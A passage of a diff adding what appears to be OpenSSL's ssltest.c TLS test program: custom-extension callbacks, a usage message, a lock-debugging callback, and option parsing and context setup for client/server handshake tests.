+static int custom_ext_0_srv_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    custom_ext_error = 1;
+    return 1;
+}
+
+/* 'add' callbacks are only called if the 'parse' callback is called */
+static int custom_ext_0_srv_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    /* Error: should not have been called */
+    custom_ext_error = 1;
+    return 0;                   /* Don't send an extension */
+}
+
+static int custom_ext_1_srv_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_1)
+        custom_ext_error = 1;
+    /* Check for "abc" */
+    if (inlen != strlen(custom_ext_cli_string))
+        custom_ext_error = 1;
+    if (memcmp(in, custom_ext_cli_string, inlen) != 0)
+        custom_ext_error = 1;
+    return 1;
+}
+
+static int custom_ext_1_srv_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    return 0;                   /* Don't send an extension */
+}
+
+static int custom_ext_2_srv_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_2)
+        custom_ext_error = 1;
+    /* Check for "abc" */
+    if (inlen != strlen(custom_ext_cli_string))
+        custom_ext_error = 1;
+    if (memcmp(in, custom_ext_cli_string, inlen) != 0)
+        custom_ext_error = 1;
+    return 1;
+}
+
+static int custom_ext_2_srv_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    *out = NULL;
+    *outlen = 0;
+    return 1;                   /* Send empty extension */
+}
+
+static int custom_ext_3_srv_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_3)
+        custom_ext_error = 1;
+    /* Check for "abc" */
+    if (inlen != strlen(custom_ext_cli_string))
+        custom_ext_error = 1;
+    if (memcmp(in, custom_ext_cli_string, inlen) != 0)
+        custom_ext_error = 1;
+    return 1;
+}
+
+static int custom_ext_3_srv_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    *out = (const unsigned char *)custom_ext_srv_string;
+    *outlen = strlen(custom_ext_srv_string);
+    return 1;                   /* Send "defg" */
+}
+
+static char *cipher = NULL;
+static int verbose = 0;
+static int debug = 0;
+#if 0
+/* Not used yet. */
+# ifdef FIONBIO
+static int s_nbio = 0;
+# endif
+#endif
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+int doit_biopair(SSL *s_ssl, SSL *c_ssl, long bytes, clock_t *s_time,
+                 clock_t *c_time);
+int doit(SSL *s_ssl, SSL *c_ssl, long bytes);
+static int do_test_cipherlist(void);
+static void sv_usage(void)
+{
+    fprintf(stderr, "usage: ssltest [args ...]\n");
+    fprintf(stderr, "\n");
+#ifdef OPENSSL_FIPS
+    fprintf(stderr, "-F             - run test in FIPS mode\n");
+#endif
+    fprintf(stderr, " -server_auth  - check server certificate\n");
+    fprintf(stderr, " -client_auth  - do client authentication\n");
+    fprintf(stderr, " -proxy        - allow proxy certificates\n");
+    fprintf(stderr, " -proxy_auth <val> - set proxy policy rights\n");
+    fprintf(stderr,
+            " -proxy_cond <val> - expression to test proxy policy rights\n");
+    fprintf(stderr, " -v            - more output\n");
+    fprintf(stderr, " -d            - debug output\n");
+    fprintf(stderr, " -reuse        - use session-id reuse\n");
+    fprintf(stderr, " -num <val>    - number of connections to perform\n");
+    fprintf(stderr,
+            " -bytes <val>  - number of bytes to swap between client/server\n");
+#ifndef OPENSSL_NO_DH
+    fprintf(stderr,
+            " -dhe1024      - use 1024 bit key (safe prime) for DHE\n");
+    fprintf(stderr,
+            " -dhe1024dsa   - use 1024 bit key (with 160-bit subprime) for DHE\n");
+    fprintf(stderr, " -no_dhe       - disable DHE\n");
+#endif
+#ifndef OPENSSL_NO_ECDH
+    fprintf(stderr, " -no_ecdhe     - disable ECDHE\n");
+#endif
+#ifndef OPENSSL_NO_PSK
+    fprintf(stderr, " -psk arg      - PSK in hex (without 0x)\n");
+#endif
+#ifndef OPENSSL_NO_SRP
+    fprintf(stderr, " -srpuser user  - SRP username to use\n");
+    fprintf(stderr, " -srppass arg   - password for 'user'\n");
+#endif
+#ifndef OPENSSL_NO_SSL2
+    fprintf(stderr, " -ssl2         - use SSLv2\n");
+#endif
+#ifndef OPENSSL_NO_SSL3_METHOD
+    fprintf(stderr, " -ssl3         - use SSLv3\n");
+#endif
+#ifndef OPENSSL_NO_TLS1
+    fprintf(stderr, " -tls1         - use TLSv1\n");
+#endif
+    fprintf(stderr, " -CApath arg   - PEM format directory of CA's\n");
+    fprintf(stderr, " -CAfile arg   - PEM format file of CA's\n");
+    fprintf(stderr, " -cert arg     - Server certificate file\n");
+    fprintf(stderr,
+            " -key arg      - Server key file (default: same as -cert)\n");
+    fprintf(stderr, " -c_cert arg   - Client certificate file\n");
+    fprintf(stderr,
+            " -c_key arg    - Client key file (default: same as -c_cert)\n");
+    fprintf(stderr, " -cipher arg   - The cipher list\n");
+    fprintf(stderr, " -bio_pair     - Use BIO pairs\n");
+    fprintf(stderr, " -f            - Test even cases that can't work\n");
+    fprintf(stderr,
+            " -time         - measure processor time used by client and server\n");
+    fprintf(stderr, " -zlib         - use zlib compression\n");
+    fprintf(stderr, " -rle          - use rle compression\n");
+#ifndef OPENSSL_NO_ECDH
+    fprintf(stderr,
+            " -named_curve arg  - Elliptic curve name to use for ephemeral ECDH keys.\n"
+            "                 Use \"openssl ecparam -list_curves\" for all names\n"
+            "                 (default is sect163r2).\n");
+#endif
+    fprintf(stderr,
+            " -test_cipherlist - Verifies the order of the ssl cipher lists.\n"
+            "                    When this option is requested, the cipherlist\n"
+            "                    tests are run instead of handshake tests.\n");
+    fprintf(stderr, " -serverinfo_file file - have server use this file\n");
+    fprintf(stderr, " -serverinfo_sct  - have client offer and expect SCT\n");
+    fprintf(stderr,
+            " -serverinfo_tack - have client offer and expect TACK\n");
+    fprintf(stderr,
+            " -custom_ext - try various custom extension callbacks\n");
+    fprintf(stderr, " -alpn_client <string> - have client side offer ALPN\n");
+    fprintf(stderr, " -alpn_server <string> - have server side offer ALPN\n");
+    fprintf(stderr,
+            " -alpn_expected <string> - the ALPN protocol that should be negotiated\n");
+}
+
+static void print_details(SSL *c_ssl, const char *prefix)
+{
+    const SSL_CIPHER *ciph;
+    X509 *cert;
+
+    ciph = SSL_get_current_cipher(c_ssl);
+    BIO_printf(bio_stdout, "%s%s, cipher %s %s",
+               prefix,
+               SSL_get_version(c_ssl),
+               SSL_CIPHER_get_version(ciph), SSL_CIPHER_get_name(ciph));
+    cert = SSL_get_peer_certificate(c_ssl);
+    if (cert != NULL) {
+        EVP_PKEY *pkey = X509_get_pubkey(cert);
+        if (pkey != NULL) {
+            if (0) ;
+#ifndef OPENSSL_NO_RSA
+            else if (pkey->type == EVP_PKEY_RSA && pkey->pkey.rsa != NULL
+                     && pkey->pkey.rsa->n != NULL) {
+                BIO_printf(bio_stdout, ", %d bit RSA",
+                           BN_num_bits(pkey->pkey.rsa->n));
+            }
+#endif
+#ifndef OPENSSL_NO_DSA
+            else if (pkey->type == EVP_PKEY_DSA && pkey->pkey.dsa != NULL
+                     && pkey->pkey.dsa->p != NULL) {
+                BIO_printf(bio_stdout, ", %d bit DSA",
+                           BN_num_bits(pkey->pkey.dsa->p));
+            }
+#endif
+            EVP_PKEY_free(pkey);
+        }
+        X509_free(cert);
+    }
+    /*
+     * The SSL API does not allow us to look at temporary RSA/DH keys,
+     * otherwise we should print their lengths too
+     */
+    BIO_printf(bio_stdout, "\n");
+}
+
+static void lock_dbg_cb(int mode, int type, const char *file, int line)
+{
+    static int modes[CRYPTO_NUM_LOCKS]; /* = {0, 0, ... } */
+    const char *errstr = NULL;
+    int rw;
+
+    rw = mode & (CRYPTO_READ | CRYPTO_WRITE);
+    if (!((rw == CRYPTO_READ) || (rw == CRYPTO_WRITE))) {
+        errstr = "invalid mode";
+        goto err;
+    }
+
+    if (type < 0 || type >= CRYPTO_NUM_LOCKS) {
+        errstr = "type out of bounds";
+        goto err;
+    }
+
+    if (mode & CRYPTO_LOCK) {
+        if (modes[type]) {
+            errstr = "already locked";
+            /*
+             * must not happen in a single-threaded program (would deadlock)
+             */
+            goto err;
+        }
+
+        modes[type] = rw;
+    } else if (mode & CRYPTO_UNLOCK) {
+        if (!modes[type]) {
+            errstr = "not locked";
+            goto err;
+        }
+
+        if (modes[type] != rw) {
+            errstr = (rw == CRYPTO_READ) ?
+                "CRYPTO_r_unlock on write lock" :
+                "CRYPTO_w_unlock on read lock";
+        }
+
+        modes[type] = 0;
+    } else {
+        errstr = "invalid mode";
+        goto err;
+    }
+
+ err:
+    if (errstr) {
+        /* we cannot use bio_err here */
+        fprintf(stderr,
+                "openssl (lock_dbg_cb): %s (mode=%d, type=%d) at %s:%d\n",
+                errstr, mode, type, file, line);
+    }
+}
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+struct cb_info_st {
+    void *input;
+    size_t len;
+    int ret;
+};
+struct cb_info_st co1 = { "C", 1, 1 }; /* try to negotiate oqaque PRF input */
+struct cb_info_st co2 = { "C", 1, 2 }; /* insist on oqaque PRF input */
+struct cb_info_st so1 = { "S", 1, 1 }; /* try to negotiate oqaque PRF input */
+struct cb_info_st so2 = { "S", 1, 2 }; /* insist on oqaque PRF input */
+
+int opaque_prf_input_cb(SSL *ssl, void *peerinput, size_t len, void *arg_)
+{
+    struct cb_info_st *arg = arg_;
+
+    if (arg == NULL)
+        return 1;
+
+    if (!SSL_set_tlsext_opaque_prf_input(ssl, arg->input, arg->len))
+        return 0;
+    return arg->ret;
+}
+#endif
+
+int main(int argc, char *argv[])
+{
+    char *CApath = NULL, *CAfile = NULL;
+    int badop = 0;
+    int bio_pair = 0;
+    int force = 0;
+    int tls1 = 0, ssl2 = 0, ssl3 = 0, ret = 1;
+    int client_auth = 0;
+    int server_auth = 0, i;
+    struct app_verify_arg app_verify_arg =
+        { APP_CALLBACK_STRING, 0, 0, NULL, NULL };
+    char *server_cert = TEST_SERVER_CERT;
+    char *server_key = NULL;
+    char *client_cert = TEST_CLIENT_CERT;
+    char *client_key = NULL;
+#ifndef OPENSSL_NO_ECDH
+    char *named_curve = NULL;
+#endif
+    SSL_CTX *s_ctx = NULL;
+    SSL_CTX *c_ctx = NULL;
+    const SSL_METHOD *meth = NULL;
+    SSL *c_ssl, *s_ssl;
+    int number = 1, reuse = 0;
+    long bytes = 256L;
+#ifndef OPENSSL_NO_DH
+    DH *dh;
+    int dhe1024 = 0, dhe1024dsa = 0;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    EC_KEY *ecdh = NULL;
+#endif
+#ifndef OPENSSL_NO_SRP
+    /* client */
+    SRP_CLIENT_ARG srp_client_arg = { NULL, NULL };
+    /* server */
+    SRP_SERVER_ARG srp_server_arg = { NULL, NULL };
+#endif
+    int no_dhe = 0;
+    int no_ecdhe = 0;
+    int no_psk = 0;
+    int print_time = 0;
+    clock_t s_time = 0, c_time = 0;
+#ifndef OPENSSL_NO_COMP
+    int comp = 0;
+    COMP_METHOD *cm = NULL;
+    STACK_OF(SSL_COMP) *ssl_comp_methods = NULL;
+#endif
+    int test_cipherlist = 0;
+#ifdef OPENSSL_FIPS
+    int fips_mode = 0;
+#endif
+    int no_protocol = 0;
+
+    verbose = 0;
+    debug = 0;
+    cipher = 0;
+
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    CRYPTO_set_locking_callback(lock_dbg_cb);
+
+    /* enable memory leak checking unless explicitly disabled */
+    if (!((getenv("OPENSSL_DEBUG_MEMORY") != NULL)
+          && (0 == strcmp(getenv("OPENSSL_DEBUG_MEMORY"), "off")))) {
+        CRYPTO_malloc_debug_init();
+        CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+    } else {
+        /* OPENSSL_DEBUG_MEMORY=off */
+        CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0);
+    }
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    RAND_seed(rnd_seed, sizeof rnd_seed);
+
+    bio_stdout = BIO_new_fp(stdout, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    argc--;
+    argv++;
+
+    while (argc >= 1) {
+        if (!strcmp(*argv, "-F")) {
+#ifdef OPENSSL_FIPS
+            fips_mode = 1;
+#else
+            fprintf(stderr,
+                    "not compiled with FIPS support, so exiting without running.\n");
+            EXIT(0);
+#endif
+        } else if (strcmp(*argv, "-server_auth") == 0)
+            server_auth = 1;
+        else if (strcmp(*argv, "-client_auth") == 0)
+            client_auth = 1;
+        else if (strcmp(*argv, "-proxy_auth") == 0) {
+            if (--argc < 1)
+                goto bad;
+            app_verify_arg.proxy_auth = *(++argv);
+        } else if (strcmp(*argv, "-proxy_cond") == 0) {
+            if (--argc < 1)
+                goto bad;
+            app_verify_arg.proxy_cond = *(++argv);
+        } else if (strcmp(*argv, "-v") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-d") == 0)
+            debug = 1;
+        else if (strcmp(*argv, "-reuse") == 0)
+            reuse = 1;
+        else if (strcmp(*argv, "-dhe1024") == 0) {
+#ifndef OPENSSL_NO_DH
+            dhe1024 = 1;
+#else
+            fprintf(stderr,
+                    "ignoring -dhe1024, since I'm compiled without DH\n");
+#endif
+        } else if (strcmp(*argv, "-dhe1024dsa") == 0) {
+#ifndef OPENSSL_NO_DH
+            dhe1024dsa = 1;
+#else
+            fprintf(stderr,
+                    "ignoring -dhe1024, since I'm compiled without DH\n");
+#endif
+        } else if (strcmp(*argv, "-no_dhe") == 0)
+            no_dhe = 1;
+        else if (strcmp(*argv, "-no_ecdhe") == 0)
+            no_ecdhe = 1;
+        else if (strcmp(*argv, "-psk") == 0) {
+            if (--argc < 1)
+                goto bad;
+            psk_key = *(++argv);
+#ifndef OPENSSL_NO_PSK
+            if (strspn(psk_key, "abcdefABCDEF1234567890") != strlen(psk_key)) {
+                BIO_printf(bio_err, "Not a hex number '%s'\n", *argv);
+                goto bad;
+            }
+#else
+            no_psk = 1;
+#endif
+        }
+#ifndef OPENSSL_NO_SRP
+        else if (strcmp(*argv, "-srpuser") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srp_server_arg.expected_user = srp_client_arg.srplogin =
+                *(++argv);
+            tls1 = 1;
+        } else if (strcmp(*argv, "-srppass") == 0) {
+            if (--argc < 1)
+                goto bad;
+            srp_server_arg.pass = srp_client_arg.srppassin = *(++argv);
+            tls1 = 1;
+        }
+#endif
+        else if (strcmp(*argv, "-ssl2") == 0) {
+#ifdef OPENSSL_NO_SSL2
+            no_protocol = 1;
+#endif
+            ssl2 = 1;
+        } else if (strcmp(*argv, "-tls1") == 0) {
+#ifdef OPENSSL_NO_TLS1
+            no_protocol = 1;
+#endif
+            tls1 = 1;
+        } else if (strcmp(*argv, "-ssl3") == 0) {
+#ifdef OPENSSL_NO_SSL3_METHOD
+            no_protocol = 1;
+#endif
+            ssl3 = 1;
+        } else if (strncmp(*argv, "-num", 4) == 0) {
+            if (--argc < 1)
+                goto bad;
+            number = atoi(*(++argv));
+            if (number == 0)
+                number = 1;
+        } else if (strcmp(*argv, "-bytes") == 0) {
+            if (--argc < 1)
+                goto bad;
+            bytes = atol(*(++argv));
+            if (bytes == 0L)
+                bytes = 1L;
+            i = strlen(argv[0]);
+            if (argv[0][i - 1] == 'k')
+                bytes *= 1024L;
+            if (argv[0][i - 1] == 'm')
+                bytes *= 1024L * 1024L;
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            server_cert = *(++argv);
+        } else if (strcmp(*argv, "-s_cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            server_cert = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            server_key = *(++argv);
+        } else if (strcmp(*argv, "-s_key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            server_key = *(++argv);
+        } else if (strcmp(*argv, "-c_cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            client_cert = *(++argv);
+        } else if (strcmp(*argv, "-c_key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            client_key = *(++argv);
+        } else if (strcmp(*argv, "-cipher") == 0) {
+            if (--argc < 1)
+                goto bad;
+            cipher = *(++argv);
+        } else if (strcmp(*argv, "-CApath") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+        } else if (strcmp(*argv, "-CAfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+        } else if (strcmp(*argv, "-bio_pair") == 0) {
+            bio_pair = 1;
+        } else if (strcmp(*argv, "-f") == 0) {
+            force = 1;
+        } else if (strcmp(*argv, "-time") == 0) {
+            print_time = 1;
+        }
+#ifndef OPENSSL_NO_COMP
+        else if (strcmp(*argv, "-zlib") == 0) {
+            comp = COMP_ZLIB;
+        } else if (strcmp(*argv, "-rle") == 0) {
+            comp = COMP_RLE;
+        }
+#endif
+        else if (strcmp(*argv, "-named_curve") == 0) {
+            if (--argc < 1)
+                goto bad;
+#ifndef OPENSSL_NO_ECDH
+            named_curve = *(++argv);
+#else
+            fprintf(stderr,
+                    "ignoring -named_curve, since I'm compiled without ECDH\n");
+            ++argv;
+#endif
+        } else if (strcmp(*argv, "-app_verify") == 0) {
+            app_verify_arg.app_verify = 1;
+        } else if (strcmp(*argv, "-proxy") == 0) {
+            app_verify_arg.allow_proxy_certs = 1;
+        } else if (strcmp(*argv, "-test_cipherlist") == 0) {
+            test_cipherlist = 1;
+        } else if (strcmp(*argv, "-serverinfo_sct") == 0) {
+            serverinfo_sct = 1;
+        } else if (strcmp(*argv, "-serverinfo_tack") == 0) {
+            serverinfo_tack = 1;
+        } else if (strcmp(*argv, "-serverinfo_file") == 0) {
+            if (--argc < 1)
+                goto bad;
+            serverinfo_file = *(++argv);
+        } else if (strcmp(*argv, "-custom_ext") == 0) {
+            custom_ext = 1;
+        } else if (strcmp(*argv, "-alpn_client") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alpn_client = *(++argv);
+        } else if (strcmp(*argv, "-alpn_server") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alpn_server = *(++argv);
+        } else if (strcmp(*argv, "-alpn_expected") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alpn_expected = *(++argv);
+        } else {
+            fprintf(stderr, "unknown option %s\n", *argv);
+            badop = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+    if (badop) {
+ bad:
+        sv_usage();
+        goto end;
+    }
+
+    /*
+     * test_cipherlist prevails over protocol switch: we test the cipherlist
+     * for all enabled protocols.
+     */
+    if (test_cipherlist == 1) {
+        /*
+         * ensure that the cipher list are correctly sorted and exit
+         */
+        fprintf(stdout, "Testing cipherlist order only. Ignoring all "
+                "other options.\n");
+        if (do_test_cipherlist() == 0)
+            EXIT(1);
+        ret = 0;
+        goto end;
+    }
+
+    if (ssl2 + ssl3 + tls1 > 1) {
+        fprintf(stderr, "At most one of -ssl2, -ssl3, or -tls1 should "
+                "be requested.\n");
+        EXIT(1);
+    }
+
+    /*
+     * Testing was requested for a compiled-out protocol (e.g. SSLv2).
+     * Ideally, we would error out, but the generic test wrapper can't know
+     * when to expect failure. So we do nothing and return success.
+     */
+    if (no_protocol) {
+        fprintf(stderr, "Testing was requested for a disabled protocol. "
+                "Skipping tests.\n");
+        ret = 0;
+        goto end;
+    }
+
+    if (!ssl2 && !ssl3 && !tls1 && number > 1 && !reuse && !force) {
+        fprintf(stderr, "This case cannot work.  Use -f to perform "
+                "the test anyway (and\n-d to see what happens), "
+                "or add one of -ssl2, -ssl3, -tls1, -reuse\n"
+                "to avoid protocol mismatch.\n");
+        EXIT(1);
+    }
+#ifdef OPENSSL_FIPS
+    if (fips_mode) {
+        if (!FIPS_mode_set(1)) {
+            ERR_load_crypto_strings();
+            ERR_print_errors(BIO_new_fp(stderr, BIO_NOCLOSE));
+            EXIT(1);
+        } else
+            fprintf(stderr, "*** IN FIPS MODE ***\n");
+    }
+#endif
+
+    if (print_time) {
+        if (!bio_pair) {
+            fprintf(stderr, "Using BIO pair (-bio_pair)\n");
+            bio_pair = 1;
+        }
+        if (number < 50 && !force)
+            fprintf(stderr,
+                    "Warning: For accurate timings, use more connections (e.g. -num 1000)\n");
+    }
+
+/*      if (cipher == NULL) cipher=getenv("SSL_CIPHER"); */
+
+    SSL_library_init();
+    SSL_load_error_strings();
+
+#ifndef OPENSSL_NO_COMP
+    if (comp == COMP_ZLIB)
+        cm = COMP_zlib();
+    if (comp == COMP_RLE)
+        cm = COMP_rle();
+    if (cm != NULL) {
+        if (cm->type != NID_undef) {
+            if (SSL_COMP_add_compression_method(comp, cm) != 0) {
+                fprintf(stderr, "Failed to add compression method\n");
+                ERR_print_errors_fp(stderr);
+            }
+        } else {
+            fprintf(stderr,
+                    "Warning: %s compression not supported\n",
+                    (comp == COMP_RLE ? "rle" :
+                     (comp == COMP_ZLIB ? "zlib" : "unknown")));
+            ERR_print_errors_fp(stderr);
+        }
+    }
+    ssl_comp_methods = SSL_COMP_get_compression_methods();
+    fprintf(stderr, "Available compression methods:\n");
+    {
+        int j, n = sk_SSL_COMP_num(ssl_comp_methods);
+        if (n == 0)
+            fprintf(stderr, "  NONE\n");
+        else
+            for (j = 0; j < n; j++) {
+                SSL_COMP *c = sk_SSL_COMP_value(ssl_comp_methods, j);
+                fprintf(stderr, "  %d: %s\n", c->id, c->name);
+            }
+    }
+#endif
+
+    /*
+     * At this point, ssl2/ssl3/tls1 is only set if the protocol is
+     * available. (Otherwise we exit early.) However the compiler doesn't
+     * know this, so we ifdef.
+     */
+#ifndef OPENSSL_NO_SSL2
+    if (ssl2)
+        meth = SSLv2_method();
+    else
+#endif
+#ifndef OPENSSL_NO_SSL3
+    if (ssl3)
+        meth = SSLv3_method();
+    else
+#endif
+#ifndef OPENSSL_NO_TLS1
+    if (tls1)
+        meth = TLSv1_method();
+    else
+#endif
+        meth = SSLv23_method();
+
+    c_ctx = SSL_CTX_new(meth);
+    s_ctx = SSL_CTX_new(meth);
+    if ((c_ctx == NULL) || (s_ctx == NULL)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (cipher != NULL) {
+        SSL_CTX_set_cipher_list(c_ctx, cipher);
+        SSL_CTX_set_cipher_list(s_ctx, cipher);
+    }
+#ifndef OPENSSL_NO_DH
+    if (!no_dhe) {
+        if (dhe1024dsa) {
+            /*
+             * use SSL_OP_SINGLE_DH_USE to avoid small subgroup attacks
+             */
+            SSL_CTX_set_options(s_ctx, SSL_OP_SINGLE_DH_USE);
+            dh = get_dh1024dsa();
+        } else if (dhe1024)
+            dh = get_dh1024();
+        else
+            dh = get_dh512();
+        SSL_CTX_set_tmp_dh(s_ctx, dh);
+        DH_free(dh);
+    }
+#else
+    (void)no_dhe;
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+    if (!no_ecdhe) {
+        int nid;
+
+        if (named_curve != NULL) {
+            nid = OBJ_sn2nid(named_curve);
+            if (nid == 0) {
+                BIO_printf(bio_err, "unknown curve name (%s)\n", named_curve);
+                goto end;
+            }
+        } else
+# ifdef OPENSSL_NO_EC2M
+            nid = NID_X9_62_prime256v1;
+# else
+            nid = NID_sect163r2;
+# endif
+
+        ecdh = EC_KEY_new_by_curve_name(nid);
+        if (ecdh == NULL) {
+            BIO_printf(bio_err, "unable to create curve\n");
+            goto end;
+        }
+
+        SSL_CTX_set_tmp_ecdh(s_ctx, ecdh);
+        SSL_CTX_set_options(s_ctx, SSL_OP_SINGLE_ECDH_USE);
+        EC_KEY_free(ecdh);
+    }
+#else
+    (void)no_ecdhe;
+#endif
+
+#ifndef OPENSSL_NO_RSA
+    SSL_CTX_set_tmp_rsa_callback(s_ctx, tmp_rsa_cb);
+#endif
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+    SSL_CTX_set_tlsext_opaque_prf_input_callback(c_ctx, opaque_prf_input_cb);
+    SSL_CTX_set_tlsext_opaque_prf_input_callback(s_ctx, opaque_prf_input_cb);
+    /* or &co2 or NULL */
+    SSL_CTX_set_tlsext_opaque_prf_input_callback_arg(c_ctx, &co1);
+    /* or &so2 or NULL */
+    SSL_CTX_set_tlsext_opaque_prf_input_callback_arg(s_ctx, &so1);
+#endif
+
+    if (!SSL_CTX_use_certificate_file(s_ctx, server_cert, SSL_FILETYPE_PEM)) {
+        ERR_print_errors(bio_err);
+    } else if (!SSL_CTX_use_PrivateKey_file(s_ctx,
+                                            (server_key ? server_key :
+                                             server_cert),
+                                            SSL_FILETYPE_PEM)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (client_auth) {
+        SSL_CTX_use_certificate_file(c_ctx, client_cert, SSL_FILETYPE_PEM);
+        SSL_CTX_use_PrivateKey_file(c_ctx,
+                                    (client_key ? client_key : client_cert),
+                                    SSL_FILETYPE_PEM);
+    }
+
+    if ((!SSL_CTX_load_verify_locations(s_ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(s_ctx)) ||
+        (!SSL_CTX_load_verify_locations(c_ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(c_ctx))) {
+        /* fprintf(stderr,"SSL_load_verify_locations\n"); */
+        ERR_print_errors(bio_err);
+        /* goto end; */
+    }
+
+    if (client_auth) {
+        BIO_printf(bio_err, "client authentication\n");
+        SSL_CTX_set_verify(s_ctx,
+                           SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT,
+                           verify_callback);
+        SSL_CTX_set_cert_verify_callback(s_ctx, app_verify_callback,
+                                         &app_verify_arg);
+    }
+    if (server_auth) {
+        BIO_printf(bio_err, "server authentication\n");
+        SSL_CTX_set_verify(c_ctx, SSL_VERIFY_PEER, verify_callback);
+        SSL_CTX_set_cert_verify_callback(c_ctx, app_verify_callback,
+                                         &app_verify_arg);
+    }
+
+    {
+        int session_id_context = 0;
+        SSL_CTX_set_session_id_context(s_ctx, (void *)&session_id_context,
+                                       sizeof session_id_context);
+    }
+
+    /* Use PSK only if PSK key is given */
+    if (psk_key != NULL) {
+        /*
+         * no_psk is used to avoid putting psk command to openssl tool
+         */
+        if (no_psk) {
+            /*
+             * if PSK is not compiled in and psk key is given, do nothing and
+             * exit successfully
+             */
+            ret = 0;
+            goto end;
+        }
+#ifndef OPENSSL_NO_PSK
+        SSL_CTX_set_psk_client_callback(c_ctx, psk_client_callback);
+        SSL_CTX_set_psk_server_callback(s_ctx, psk_server_callback);
+        if (debug)
+            BIO_printf(bio_err, "setting PSK identity hint to s_ctx\n");
+        if (!SSL_CTX_use_psk_identity_hint(s_ctx, "ctx server identity_hint")) {
+            BIO_printf(bio_err, "error setting PSK identity hint to s_ctx\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+#endif
+    }
+#ifndef OPENSSL_NO_SRP
+    if (srp_client_arg.srplogin) {
+        if (!SSL_CTX_set_srp_username(c_ctx, srp_client_arg.srplogin)) {
+            BIO_printf(bio_err, "Unable to set SRP username\n");
+            goto end;
+        }
+        SSL_CTX_set_srp_cb_arg(c_ctx, &srp_client_arg);
+        SSL_CTX_set_srp_client_pwd_callback(c_ctx,
+                                            ssl_give_srp_client_pwd_cb);
+        /*
+         * SSL_CTX_set_srp_strength(c_ctx, srp_client_arg.strength);
+         */
+    }
+
+    if (srp_server_arg.expected_user != NULL) {
+        SSL_CTX_set_verify(s_ctx, SSL_VERIFY_NONE, verify_callback);
+        SSL_CTX_set_srp_cb_arg(s_ctx, &srp_server_arg);
+        SSL_CTX_set_srp_username_callback(s_ctx, ssl_srp_server_param_cb);
+    }
+#endif
+
+    if (serverinfo_sct)
+        SSL_CTX_add_client_custom_ext(c_ctx, SCT_EXT_TYPE,
+                                      NULL, NULL, NULL,
+                                      serverinfo_cli_parse_cb, NULL);
+    if (serverinfo_tack)
+        SSL_CTX_add_client_custom_ext(c_ctx, TACK_EXT_TYPE,
+                                      NULL, NULL, NULL,
+                                      serverinfo_cli_parse_cb, NULL);
+
+    if (serverinfo_file)
+        if (!SSL_CTX_use_serverinfo_file(s_ctx, serverinfo_file)) {
+            BIO_printf(bio_err, "missing serverinfo file\n");
+            goto end;
+        }
+
+    if (custom_ext) {
+        SSL_CTX_add_client_custom_ext(c_ctx, CUSTOM_EXT_TYPE_0,
+                                      custom_ext_0_cli_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_0_cli_parse_cb, NULL);
+        SSL_CTX_add_client_custom_ext(c_ctx, CUSTOM_EXT_TYPE_1,
+                                      custom_ext_1_cli_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_1_cli_parse_cb, NULL);
+        SSL_CTX_add_client_custom_ext(c_ctx, CUSTOM_EXT_TYPE_2,
+                                      custom_ext_2_cli_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_2_cli_parse_cb, NULL);
+        SSL_CTX_add_client_custom_ext(c_ctx, CUSTOM_EXT_TYPE_3,
+                                      custom_ext_3_cli_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_3_cli_parse_cb, NULL);
+
+        SSL_CTX_add_server_custom_ext(s_ctx, CUSTOM_EXT_TYPE_0,
+                                      custom_ext_0_srv_add_cb,
+                                      NULL, NULL,
+                                      custom_ext_0_srv_parse_cb, NULL);
